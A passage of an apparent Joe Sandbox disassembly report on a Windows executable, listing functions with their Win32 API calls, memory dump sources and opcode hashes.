                                                                                                        • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                        • API String ID: 2574300362-275556492
                                                                                                        • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                        • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                                        • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                        • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                                        Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                        • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                        • API String ID: 2574300362-58917771
                                                                                                        • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                        • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                                        • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                        • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                                        Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                        • API String ID: 2574300362-4033151799
                                                                                                        • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                        • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                        • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                        • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                        Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                        • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                                        • String ID:
                                                                                                        • API String ID: 2808897238-0
                                                                                                        • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                        • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                        • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                        • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                        Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                        • __itow.LIBCMT ref: 004699CD
                                                                                                          • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                        • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                                        • __itow.LIBCMT ref: 00469A97
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$__itow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3379773720-0
                                                                                                        • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                        • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                        • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                        • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                                        Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                        • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3880355969-0
                                                                                                        • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                        • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                        • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                        • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                        Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                        • String ID:
                                                                                                        • API String ID: 2782032738-0
                                                                                                        • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                        • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                                        • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                        • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                                        Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                        • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                        • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1352109105-0
                                                                                                        • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                        • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                        • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                        • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                        Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                        • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 3321077145-0
                                                                                                        • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                        • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                        • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                        • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                                        Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                                        • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                        • String ID:
                                                                                                        • API String ID: 3058430110-0
                                                                                                        • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                        • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                                        • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                        • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                                        Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 004503C8
                                                                                                        • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                        • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                        • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Proc$Parent
                                                                                                        • String ID:
                                                                                                        • API String ID: 2351499541-0
                                                                                                        • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                        • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                        • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                        • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                                        Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                                        • TranslateMessage.USER32(?), ref: 00442B01
                                                                                                        • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchTranslate
                                                                                                        • String ID:
                                                                                                        • API String ID: 1795658109-0
                                                                                                        • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                        • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                                        • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                        • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                                        Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                        • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                        • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2759813231-0
                                                                                                        • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                        • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                        • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                        • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                        Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                        • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                                        • _wcslen.LIBCMT ref: 00449519
                                                                                                        • _wcslen.LIBCMT ref: 00449526
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend_wcslen$_wcspbrk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2886238975-0
                                                                                                        • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                        • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                                        • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                        • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                                        Function 0046888B Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
